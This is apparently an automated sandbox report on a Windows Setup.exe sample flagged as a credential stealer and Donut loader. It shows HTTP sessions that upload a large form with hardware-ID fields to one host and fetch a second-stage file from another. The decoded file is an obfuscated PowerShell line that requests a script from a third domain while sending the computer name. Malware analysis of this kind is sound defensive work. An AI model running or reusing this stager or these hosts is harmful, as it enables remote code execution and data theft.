                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9H%2F0bDub8aUd3qRG%2FmSy3HT6IrFulh8CJwB5L%2FL7M19WWbord9IqD0KXU7QcUSWQm9D5N994qhos7eOVBCJPHby%2FmlqI326%2FIlJYAnmqB5xwYwaaQk09wXl6xcI4A2nOCYBqRAfU"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b33dec00435e-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=33892&min_rtt=1843&rtt_var=19779&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2114&delivery_rate=1584373&cwnd=240&unsent_bytes=0&cid=9501d7e8bb4c3951&ts=762&x=0"
                                                                                                      2025-01-01 15:56:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-01-01 15:56:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.449743188.114.97.34436984C:\Users\user\Desktop\Setup.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-01 15:56:36 UTC276OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=IALSNE3Y
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 549614
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: 2d 2d 49 41 4c 53 4e 45 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 49 41 4c 53 4e 45 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 41 4c 53 4e 45 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 49 41 4c 53 4e 45 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                      Data Ascii: --IALSNE3YContent-Disposition: form-data; name="hwid"48F435348DABFB10F354CDD8344DEF36--IALSNE3YContent-Disposition: form-data; name="pid"1--IALSNE3YContent-Disposition: form-data; name="lid"hRjzG3--TRON--IALSNE3YContent-Dispositi
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: 7a 43 94 86 c2 77 e3 86 01 4f 72 4c ac ff cf 65 84 7d 15 40 13 97 73 b3 2d fe 32 60 fb 24 1f 9d c6 56 10 33 5d a0 7b 1a 0b c4 ae a8 c3 4a f9 84 e4 10 df 82 b3 ce 82 02 01 d2 c4 f5 1b e3 27 e2 04 68 f3 c5 ea 53 f1 77 c2 ed 36 22 02 8e 85 ed 65 18 fd 21 64 eb ec 7c 10 65 1c 84 d7 07 25 1d 41 fe 93 79 10 9c 0d 55 4a e1 8f 34 c3 85 fb 81 83 56 27 20 57 f3 bc 05 91 ea 1b 97 16 05 6e fc db f2 71 c0 a5 6f ac ef 5d da 88 fd 90 d3 3b 74 a8 66 fd c6 55 2a 54 60 5f d1 61 52 72 35 31 c4 75 32 2d 0a 05 f7 ee f7 11 31 c2 84 22 d3 4e 0c 4d cb c1 80 24 ff 78 6a 2e 28 0e 76 74 59 73 68 d0 c0 4f 07 2c 1d 7c df a7 07 b6 1b cb ef be 39 35 3a 78 71 77 bf f7 8d 93 bd d2 bd 93 63 8a f6 6f 1d 4a aa b2 df d8 54 14 fc 77 31 6d f6 f0 3f 40 ab 2a f4 83 b7 20 30 d2 10 1d df a6 8f df
                                                                                                      Data Ascii: zCwOrLe}@s-2`$V3]{J'hSw6"e!d|e%AyUJ4V' Wnqo];tfU*T`_aRr51u2-1"NM$xj.(vtYshO,|95:xqwcoJTw1m?@* 0
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: c1 f8 80 e1 5a aa 09 f7 fb c7 f1 b8 b2 d1 c9 e9 e9 e8 3a fd 09 25 67 15 b0 d3 31 02 22 c8 ed c3 53 2d 03 89 2a 4a 8a 11 71 bf de 9f 38 26 1f 69 e0 d4 65 88 f3 3b ae c2 e7 c7 cb 57 eb ea e0 1e 35 96 fd 7a 97 41 e0 bf ab 66 3d 2d f0 aa 84 87 47 f3 f3 88 c7 a2 f9 85 d6 94 fa 96 84 76 36 c9 69 bf da a8 7d 14 47 90 43 09 ed c1 99 3c d4 5d 12 af 54 79 25 98 da 72 27 b4 76 4f fe a4 5c 3f ff 77 f5 ac c9 2b a3 bf cf 46 5f 4d 0f d9 c7 77 37 48 b4 8f da 6c f8 bc 31 1a f6 17 ff a5 58 3b 15 c2 8f fe c9 ec 5e 77 ba e2 f7 28 d3 10 d1 99 25 9a 95 db 22 2b b4 3e 1c 7b 6c 08 ea 8e da 12 79 ba a3 40 25 9d a5 3c c1 4b 17 c9 90 78 c1 0e 16 4d 17 63 8e 6f ce 72 bb df 73 f4 5b 4d f0 1e fa bf 76 98 b6 76 d2 1f 94 40 fc 8b b2 8b d7 e7 6d 46 22 05 08 47 43 6d 28 57 f2 35 06 f4 f8
                                                                                                      Data Ascii: Z:%g1"S-*Jq8&ie;W5zAf=-Gv6i}GC<]Ty%r'vO\?w+F_Mw7Hl1X;^w(%"+>{ly@%<KxMcors[Mvv@mF"GCm(W5
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: 5c 72 39 b0 f1 a2 5f a0 27 b3 e2 f3 48 4d c5 cb 7f 58 4c 6e 7e ec e9 ea a9 95 3f 4e 4c 6a f3 39 a1 ae b1 9f 5b bf a9 be c6 ee 36 af 38 d7 3e ed cf a4 e6 ed 05 8e c2 45 00 73 eb 34 70 bc b0 83 67 a7 4e af 6c a1 30 cb 6d 58 82 55 7a a0 8d c3 51 c7 87 db 7c 5d 7f 74 2f c2 6a 42 6e b2 40 1a c8 c6 84 dc f2 9a 87 e8 76 a1 f6 06 1f d4 f1 33 bd 6f c8 6d 26 4f c3 2d b4 80 c3 c7 5f 1b 88 8f 30 05 1e f2 ff df 11 e8 48 e6 28 04 ca d0 50 93 01 b8 56 96 8b 88 2c 89 48 cd 52 14 b8 10 f2 54 9b 6f 8d 2e ae 8a 7d f5 4a 71 48 eb 07 20 ec 21 3a 62 9e 61 89 5f 26 5d 3d b8 81 c5 4f 0c a3 54 50 20 f1 23 27 c4 26 c2 26 31 d4 b0 c9 aa 34 88 36 3e db b8 e0 6a c0 ba 4b 77 bd 71 d3 b8 77 c6 70 ad 8f 18 13 39 98 23 40 3f 23 03 a3 09 3e 67 5d b8 35 0a 54 67 73 06 92 0a 68 15 dd ae 5a
                                                                                                      Data Ascii: \r9_'HMXLn~?NLj9[68>Es4pgNl0mXUzQ|]t/jBn@v3om&O-_0H(PV,HRTo.}JqH !:ba_&]=OTP #'&&146>jKwqwp9#@?#>g]5TgshZ
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: bb 00 a6 12 e6 84 bc 9a df 63 c6 32 12 4d ed 89 ff 46 22 d0 d4 50 b1 3d d2 d8 79 94 27 da bc 1d 65 ee a4 f1 eb 32 fe a5 df d6 7b 10 dd 71 2e 80 d5 87 20 b1 8c 00 a6 6f 3a dd 66 cd cc ee 3c b9 7a 82 73 cd 00 8f 9f d2 0d fe 2a 19 88 e5 c1 08 63 7a 15 c6 d1 8c a8 a2 6e a3 39 d9 0f d6 8c 26 63 6c b8 50 a3 bc 95 7b a6 53 d2 e8 c8 f8 9d 99 a1 8a f8 cd 97 02 14 7e ce 9d d1 60 6c 3d a9 f6 3a 93 19 f1 f7 20 b9 4e 22 d2 b8 0e c1 0e 84 49 94 a3 2e 11 69 7d 68 46 5c b9 7a 3a 7c 8f 6f e9 29 9f 8a 64 b2 a5 7d 46 02 4e 48 70 3f a3 64 cf 2e 1d 2e e9 bb ac e9 8d 67 12 91 87 f9 4c aa 7e ac 34 69 dd 5c cd 6c dd e2 0e 6b d2 c1 08 81 d7 03 6a e3 59 6f b8 c0 9f af 63 4f 22 6b 8c 74 b3 12 78 85 c0 ed 09 68 f1 9c 69 66 82 68 ec f3 85 73 09 ec 1f df d7 70 4d f9 ab 6a 64 b1 3f c7
                                                                                                      Data Ascii: c2MF"P=y'e2{q. o:f<zs*czn9&clP{S~`l=: N"I.i}hF\z:|o)d}FNHp?d..gL~4i\lkjYocO"ktxhifhspMjd?
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: be 7e 5b b2 4c af e8 68 8a e7 5c 11 16 ff f1 37 b7 c3 15 7b 07 0e f2 87 4e 60 42 fd 51 3f 16 70 b1 59 75 26 34 f3 b0 89 10 09 ce fc 93 c0 4a 2f 56 82 ca b5 71 b0 ec 9b 5e 51 98 bd 5b 06 36 c4 c0 2f b9 d8 f5 51 a2 83 6d af ce 12 ab eb bb 25 6c 2f bc f0 e2 e9 ff 0e d3 5c cf c0 de e1 92 16 a1 bf 42 ec 44 55 99 48 2a 6c 33 56 2b ca b2 5b 57 ab 7d 86 32 d4 fd 30 ef f5 c1 fd d9 67 2e a0 6f ae 31 ce ec cc 14 b9 0a dd a4 aa 6b 2e a3 67 d1 cb 39 33 36 47 c9 74 d6 92 2a 6d 0c 80 b7 68 c6 3c ab 8f 94 26 02 08 7b c4 a2 94 b8 d9 0d db 6b 83 ff ae 4b 8e d4 30 3b a7 7e 26 c8 1d 77 86 f7 81 06 95 9d fd 0e b3 2d 10 06 1c 92 62 c8 37 c0 d4 b0 4b 5c e0 81 38 43 0f 91 76 77 af ef 7b bf 35 7b b7 89 49 15 62 6f fc da aa a4 65 f9 c5 9b 2c 3d 71 65 f7 4c 0e fe ed 59 b8 8e 07 2c
                                                                                                      Data Ascii: ~[Lh\7{N`BQ?pYu&4J/Vq^Q[6/Qm%l/\BDUH*l3V+[W}20g.o1k.g936Gt*mh<&{kK0;~&w-b7K\8Cvw{5{Iboe,=qeLY,
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: f1 d1 7a fe 71 2c de e5 4e e0 b7 23 8f 96 b6 32 bd 8c f7 89 6c 78 39 0a 28 54 f7 bc f4 c6 14 0d 5f c6 e1 11 df 7f a7 63 c7 8a 17 cc 49 fc 5f 37 db 11 75 40 da a9 ca e8 66 b6 79 aa ef 13 07 57 fe 49 dd 11 eb cc 83 28 12 84 09 a5 3d f6 c8 b1 f9 5a 08 cc 3e 0b 85 88 72 59 ca 90 a3 70 ef 49 8e d6 b9 34 ee bd 1e 74 4c 1f de e5 22 31 90 f7 7e a4 45 db a6 66 ad 68 96 87 5c c9 9a 66 e6 08 75 8a 86 bb 48 16 47 54 1f 01 16 a3 99 1a a8 ef d8 de bf b4 e1 8a 86 ab 38 48 ad 01 1b 7b 35 b2 1c b2 76 b4 97 00 3c 35 4e 10 71 28 04 cf 2a 76 ce ce 12 99 64 1d 1e fc 7e 85 52 b9 eb b6 12 73 64 82 65 29 96 85 0d fb f9 ab d5 ff 77 81 2f f3 30 b3 a4 f8 98 f0 c2 e5 98 4c 1d 8c f1 79 b2 2f ef ac 4c 9c a1 38 96 23 0d bd 1e 89 9b 2d 8e 11 57 1d 08 33 4e 52 f5 e4 20 da 44 8e b2 d0 a6
                                                                                                      Data Ascii: zq,N#2lx9(T_cI_7u@fyWI(=Z>rYpI4tL"1~Efh\fuHGT8H{5v<5Nq(*vd~Rsde)w/0Ly/L8#-W3NR D
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: 20 f0 08 ca 70 d8 5b 7a a9 58 2e 65 c4 e5 d4 a6 34 c2 73 d9 39 d3 b8 09 7d 0a 11 1a 89 f5 42 aa 53 57 b3 53 77 bd c1 00 97 f3 eb 72 ac 78 67 bc 7c f0 77 5f 58 1b 5f 9c f4 cd 77 28 ff da 54 06 4b 6f c7 5e 16 91 d1 84 6e 92 55 44 30 15 7b 0d 12 36 aa 38 84 7b 39 a6 fb fb 47 a2 28 0a a3 b7 56 c9 95 c7 39 7a f5 d5 dc 94 7f 40 8f 22 a4 61 74 4c 6b a5 7a d9 c3 da 12 27 26 32 ac 3e 25 84 73 fb f8 93 0b ac 4a 07 a7 8e e4 1e 09 4d 3e 72 f2 fc bf d3 66 2c d2 ba e8 0e 3b a2 e4 1b 5b 6c db ac 5c d4 4a cf 69 28 23 db 27 71 e7 c5 a5 69 c3 d1 4f 76 d0 67 9e 27 f0 59 2c 98 17 ee 4b 3f 07 b4 16 0e 10 4b 10 88 a3 bc 9b b2 fd 57 d2 06 b0 80 1c 0e 9d e3 03 e5 56 ee bf bc dd 4f 3e 01 9d 47 38 31 36 69 11 f9 a7 6e 79 10 9d 1a 1c fd b2 2a d0 33 84 53 f9 6a 53 9c 09 b4 cb b1 a6
                                                                                                      Data Ascii: p[zX.e4s9}BSWSwrxg|w_X_w(TKo^nUD0{68{9G(V9z@"atLkz'&2>%sJM>rf,;[l\Ji(#'qiOvg'Y,K?KWVO>G816iny*3SjS
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: e6 04 4d 01 20 81 95 4a 75 cf 53 23 2c e8 e9 19 a1 8f de 6d d0 1f 3a 31 e0 9b fe a4 b5 fb f3 c3 7c 33 41 de ad 79 fb 4f 46 d4 ff dd 12 13 04 21 3e 8b 8b 68 a0 8d bf 82 03 6f d1 85 02 a8 61 32 59 f2 9f e0 34 6d 9f c4 cd 63 35 96 c6 fc be 3a 08 06 0c 38 41 ce 91 a5 f6 a2 e8 01 0e 85 4a c3 5c c9 c3 fd 52 23 ae f1 d8 11 55 ba 00 46 9b e5 19 4d 0d 06 f8 f5 c7 ac b1 15 c0 a7 62 3e 78 5c e4 cd 56 dc be 69 2b 34 af 9d 0f 9f 99 33 55 73 e2 d4 e6 b3 8a 54 63 5e c1 31 f1 7b 10 6c d4 ad bf 7e c5 41 02 75 3d 61 02 02 37 08 b8 06 5c bd 72 54 c8 6e 2a 3f 80 70 d0 0a 71 6f e8 4e ae 5d 6b ce 2c d9 c5 c6 d4 69 04 7b d9 12 ef 81 79 8d 4e 22 24 1d ac 31 46 27 6d 22 0a 70 db 67 73 12 e8 02 02 bf a6 6c 0a 6d 6c 6d 03 33 f7 c6 96 7f f1 da 52 a6 d6 23 28 d6 27 b3 7c 7c 14 97 a0
                                                                                                      Data Ascii: M JuS#,m:1|3AyOF!>hoa2Y4mc5:8AJ\R#UFMb>x\Vi+43UsTc^1{l~Au=a7\rTn*?pqoN]k,i{yN"$1F'm"pgslmlm3R#('||
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: da eb 68 c2 19 fe 6b 92 82 8e f3 fa 34 81 af f6 ff f7 d2 1b eb 38 bd 93 99 10 1f 93 58 b6 d3 90 97 79 57 cd 4b 10 f1 c6 2c 7a ac 31 11 30 ec 8e 82 fc c3 33 2a 50 fe 2f 33 a6 bb c3 f0 c5 ab 5f 44 2b 77 de 2c 66 6b 20 20 f2 8b 6b ea 69 6f d6 d5 fc 70 46 42 fe 52 cd 84 cb 14 3c 51 db 44 aa 40 ab 0b 58 b6 ee 08 3d 0a c3 30 35 28 46 ad d0 14 e7 ed 7e 7d b9 48 25 65 02 c0 4e 8e de 71 fe c6 90 ef ec 40 4f 0f e9 03 ae f3 07 46 6b c2 7b 6e 0b 38 06 2d bc 9a b7 57 21 b6 d0 b3 3c 06 2b e5 06 4b ee ba e4 8b 2d 0c 84 49 45 7a 37 2b 77 8c 2d 15 6b d3 a3 a8 75 b3 1e 79 21 08 f7 02 c6 fe 5c 1f 7b 45 18 84 78 cf cd ca c3 61 7e d0 6b cd a4 89 0f 7b 52 60 51 c7 4f 54 49 d6 6c 5f 05 f7 bd 64 90 d3 6e b2 0d cb 63 04 5a 7f ae e9 42 f1 1e 55 53 d1 06 19 01 93 67 9e 2d 8f 6e 1c
                                                                                                      Data Ascii: hk48XyWK,z103*P/3_D+w,fk kiopFBR<QD@X=05(F~}H%eNq@OFk{n8-W!<+K-IEz7+w-kuy!\{Exa~k{R`QOTIl_dncZBUSg-n
                                                                                                      2025-01-01 15:56:38 UTC1139INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:38 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=34mtaov7k8912rlo6snp44ccn8; expires=Sun, 27 Apr 2025 09:43:16 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2qqbv1%2BJ8PsNnkK3tcF35Eqn9LeJKlCRUI83VMTewiUtaq%2FvkfC2Mqh52p9HTBzvfpu%2FCcfbgH2y%2BXlVcl%2Bxqd9oAl7cOs7AE%2F7cb0CPpvJFVGD9dBHcXqjClGqVAmcKnQxst4jJ"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b3483d0e425b-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2140&min_rtt=2137&rtt_var=809&sent=192&recv=568&lost=0&retrans=0&sent_bytes=2847&recv_bytes=552088&delivery_rate=1347485&cwnd=238&unsent_bytes=0&cid=72674d915cea4e08&ts=1671&x=0"


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.449744188.114.97.34436984C:\Users\user\Desktop\Setup.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-01 15:56:38 UTC268OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 113
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:38 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36
                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=48F435348DABFB10F354CDD8344DEF36
                                                                                                      2025-01-01 15:56:39 UTC1124INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:39 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=dtrp9u78825i9hbd3ba4oo9gkd; expires=Sun, 27 Apr 2025 09:43:17 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0yHUeqSb3MZi1WexsdgkqISknMkh2EK5v8TeI5jzUfC3WnSjOHOii7EPVlep3bLkDNxhoPbFU3%2BPJ8COsPoSW2kIFsIehIdUMFkGZLCNftlkQJfoAaUoi0%2B3VuUImHOr9AcWjhL"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b355fd6e7d20-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2156&min_rtt=2017&rtt_var=1036&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1017&delivery_rate=931122&cwnd=207&unsent_bytes=0&cid=66304b817bd9f80d&ts=477&x=0"
                                                                                                      2025-01-01 15:56:39 UTC218INData Raw: 64 34 0d 0a 59 55 6f 6e 54 50 5a 64 32 30 34 43 32 42 68 51 61 79 59 35 30 48 78 52 37 61 72 42 2f 78 57 72 6b 49 55 53 43 72 4a 47 59 61 49 36 4d 51 55 35 31 47 66 35 4a 6e 61 73 61 43 4e 52 65 68 61 4d 55 7a 4b 49 7a 62 54 52 5a 73 50 2f 39 55 34 6c 69 6e 4e 57 6c 6c 4e 38 46 58 6a 43 61 34 64 68 63 72 41 32 4a 42 4e 53 47 2f 78 65 4e 35 6d 49 2b 38 30 35 69 66 57 6e 4b 44 76 50 61 68 71 41 46 47 67 64 62 70 34 70 72 7a 35 78 34 6b 52 2f 4e 77 6c 53 76 42 55 68 6d 39 2b 73 6c 6d 62 65 2b 61 74 68 59 74 30 32 50 59 30 49 4a 46 4d 54 6c 54 47 72 45 58 47 77 65 58 34 66 58 6b 33 79 55 48 4f 4c 33 75 50 46 4a 59 65 79 34 44 41 77 67 6a 73 38 0d 0a
                                                                                                      Data Ascii: d4YUonTPZd204C2BhQayY50HxR7arB/xWrkIUSCrJGYaI6MQU51Gf5JnasaCNRehaMUzKIzbTRZsP/9U4linNWllN8FXjCa4dhcrA2JBNSG/xeN5mI+805ifWnKDvPahqAFGgdbp4prz5x4kR/NwlSvBUhm9+slmbe+athYt02PY0IJFMTlTGrEXGweX4fXk3yUHOL3uPFJYey4DAwgjs8
                                                                                                      2025-01-01 15:56:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.449745185.161.251.214436984C:\Users\user\Desktop\Setup.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-01 15:56:39 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Host: cegu.shop
                                                                                                      2025-01-01 15:56:40 UTC249INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.26.2
                                                                                                      Date: Wed, 01 Jan 2025 15:56:40 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Content-Length: 329
                                                                                                      Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                      Connection: close
                                                                                                      ETag: "676c9e2a-149"
                                                                                                      Accept-Ranges: bytes
                                                                                                      2025-01-01 15:56:40 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                      Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:10:56:06
                                                                                                      Start date:01/01/2025
                                                                                                      Path:C:\Users\user\Desktop\Setup.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                      Imagebase:0x450000
                                                                                                      File size:74'880'677 bytes
                                                                                                      MD5 hash:ABDA8CEA9C2D8BC35847D4D189F61F2E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4139966079.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Non-executed Functions

                                                                                                        Function 014AC7F8 Relevance: .1, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Offset: 014A5000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_14a5000_Setup.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a9d2e35ff53e1cbfe6b479e96df18c90b63f04cc91cd3786fc25d50427fd0156
                                                                                                        • Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
                                                                                                        • Opcode Fuzzy Hash: a9d2e35ff53e1cbfe6b479e96df18c90b63f04cc91cd3786fc25d50427fd0156
                                                                                                        • Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92